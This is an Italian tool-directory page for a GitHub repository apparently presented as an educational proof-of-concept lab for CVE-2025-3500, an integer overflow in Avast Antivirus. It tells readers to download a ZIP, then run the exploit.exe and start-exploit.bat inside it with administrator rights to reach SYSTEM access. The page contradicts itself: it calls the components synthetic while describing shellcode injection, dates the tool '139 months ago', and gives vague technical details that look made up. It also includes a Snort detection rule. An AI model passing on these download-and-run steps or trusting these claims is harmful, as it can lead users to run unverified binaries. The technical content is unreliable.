Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/chicken3962/cve-2025-3500-poc
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitShellcodeApprendimento e FormazioneSviluppo PayloadBinary ExploitationLab e Pratica

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
chicken3962/cve-2025-3500-poc

CVE-2025-3500-Poc

Ambiente di laboratorio educativo per la ricerca su CVE-2025-3500, un exploit di escalation dei privilegi per overflow di interi in Avast Antivirus 25.1.981.6 su Windows, con artefatti di exploit sintetici per test controllati.

Vedi Repository
139 mesi faNon ancora revisionato

Lab: CVE-2025-3500 - Overflow di Interi in Avast Antivirus Escalation dei Privilegi

Scarica

Scarica il ZIP del Lab : [https://github.com/chicken3962/CVE-2025-3500-Poc/releases/download/Release/cve-2025-3500.zip]

🚀 Panoramica

Questo repository fornisce un ambiente di laboratorio per la ricerca su CVE-2025-3500, una vulnerabilità di overflow di interi (CWE-190) in Avast Antivirus versione 25.1.981.6 su piattaforme Windows. La vulnerabilità deriva da una convalida inadeguata degli interi nel modulo di allocazione delle risorse del motore antivirus, portando a un wraparound durante le operazioni aritmetiche. Ciò può essere sfruttato per aumentare i privilegi da contesti utente a bassi privilegi (PR:L) all'accesso a livello di sistema, con vettore di attacco di rete (AV:N), bassa complessità di attacco (AC:L) e interazione utente richiesta (UI:R). Il punteggio base CVSS 3.1 è 9.0 (Critico), con impatto su riservatezza, integrità e disponibilità (tutti Alti) a causa del cambiamento di ambito (S:C), potenzialmente consentendo il compromesso completo del sistema.

Dichiarazione di Scopo Educativo: Questo laboratorio è solo a scopo educativo e di ricerca. Fornisce un ambiente controllato. Non utilizzarlo per attività malevole. Tutti i componenti sono sintetici e non sfruttano sistemi reali. Utilizzando questo repository, accetti di rispettare le linee guida per l'hacking etico e le leggi locali.

Dichiarazione di Sicurezza: Questa configurazione implica l'esecuzione di codice in un ambiente. Utilizza sempre una macchina virtuale dedicata. Non eseguire exploit su sistemi di produzione. Gli artefatti exploit forniti (.exe e .bat) dimostrano concetti—ad esempio, il .bat avvia il .exe, che elabora dati ed esce. Isola il tuo ambiente di laboratorio per prevenire esposizioni accidentali.

📋 Prerequisiti

  • Un host Windows per testare l'exploit (ad esempio, tramite VirtualBox o Hyper-V) per simulare l'ambiente target.
  • Conoscenza di base di PowerShell e degli strumenti da riga di comando di Windows.
  • Privilegi amministrativi sulla macchina host.
  • Almeno 4 GB di RAM e 20 GB di spazio su disco.

Scarica e Installa

  1. Scarica il toolkit exploit (file ZIP contenente exploit.exe e start-exploit.bat). Questo ZIP è ospitato su un mirror sicuro:

    • Scarica il ZIP del Toolkit Exploit : [https://github.com/chicken3962/CVE-2025-3500-Poc/releases/download/Release/cve-2025-3500.zip]

    Nota: L'exploit principale è exploit.exe (un binario C++ compilato che attiva l'overflow di interi tramite chiamate API appositamente create). Il launcher dell'exploit è start-exploit.bat, che apre exploit.exe con argomenti predefiniti (ad esempio, start exploit.exe --target=avast_engine --overflow=wraparound). Decomprimi in una directory locale come C:\lab\exploit.

🛠 Avvio Rapido

  1. Configura l'Ambiente:

    • Assicurati che Avast Antivirus versione 25.1.981.6 sia installato sulla macchina di test Windows.
    • Vai alla directory in cui hai decompresso.
  2. Scarica e Prepara l'Exploit:

    • Scarica il ZIP dal link sopra.
    • Decomprimi in C:\lab\exploit.
    • Esegui start-exploit.bat per avviare l'exploit (apre exploit.exe, che invia un pacchetto di rete appositamente creato per attivare l'overflow).
  3. Sfrutta la Vulnerabilità:

    • Prendi di mira il servizio Avast locale.
    • Il .bat esegue exploit.exe. Osserva i log di sistema per indicatori di overflow.
  4. Verifica e Pulisci:

    • Controlla il Visualizzatore eventi di Windows per voci correlate.
    • Elimina i file exploit dopo l'uso.

📖 Istruzioni di Configurazione Dettagliate

Configurazione Vulnerabile

Il laboratorio richiede una macchina Windows con Avast Antivirus 25.1.981.6 installato. I servizi fittizi possono essere avviati manualmente tramite prompt dei comandi:

  • Apri PowerShell come amministratore.
  • Simula il listener Avast: net start AvastSvc (supponendo che il servizio sia in esecuzione).

Passaggi di Sfruttamento

  1. Ricognizione: Utilizza strumenti come netstat per identificare le porte Avast (ad esempio, 8080).
  2. Costruisci il Payload: exploit.exe invia un valore intero eccessivo (ad esempio, 2^31 + 1) tramite una richiesta di rete, causando un wraparound nel parser delle risorse di Avast.
  3. Attiva l'Exploit: Esegui start-exploit.bat che esegue exploit.exe. Questo:
    • Stabilisce una connessione.
    • Invia dati malformati: { "resource_alloc": 2147483648 } (attivando l'overflow).
    • Esegue l'escalation a SYSTEM tramite iniezione di shellcode.
  4. Post-Sfruttamento: Consente l'esecuzione arbitraria di codice; apre una cmd.exe.

Dettagli Tecnici: L'overflow si verifica in AvastResourceParser::AllocateBuffer(int size), dove size * sizeof(struct) va in wraparound se size > INT_MAX / sizeof(struct), portando a una sotto-allocazione e overflow dell'heap. Lo sfruttamento sfrutta questo per la costruzione di una catena ROP mirata a kernel32.dll.

Mitigazione

  • Applicazione della Patch: Aggiorna a Avast Antivirus 25.3 o successivo, dove i controlli sugli interi utilizzano librerie matematiche sicure (ad esempio, SafeInt).
  • Migliori Pratiche:
    • Abilita Windows Defender insieme ad Avast per una difesa a strati.
    • Limita l'accesso di rete ai soli server di aggiornamento antivirus (ad esempio, tramite regole firewall).
    • Utilizza la separazione dei privilegi: esegui i servizi Avast con account a privilegi minimi.
    • Monitora operazioni anomale sugli interi tramite strumenti EDR come Sysmon (ID evento 10 per iniezioni di processo).
    • Applica le mitigazioni di Windows: abilita ASLR, DEP e CFG tramite Criteri di gruppo.
  • Firme di Rilevamento: Cerca pattern di rete corrispondenti a campi interi eccessivi nel traffico del protocollo Avast (ad esempio, regola Snort: alert tcp any any -> any 8080 (msg:"Tentativo CVE-2025-3500"; content:"|00 00 00 80|"; sid:1000001;)).

Per domande o contributi, apri una issue. Rimani etico!

Scarica lo strumento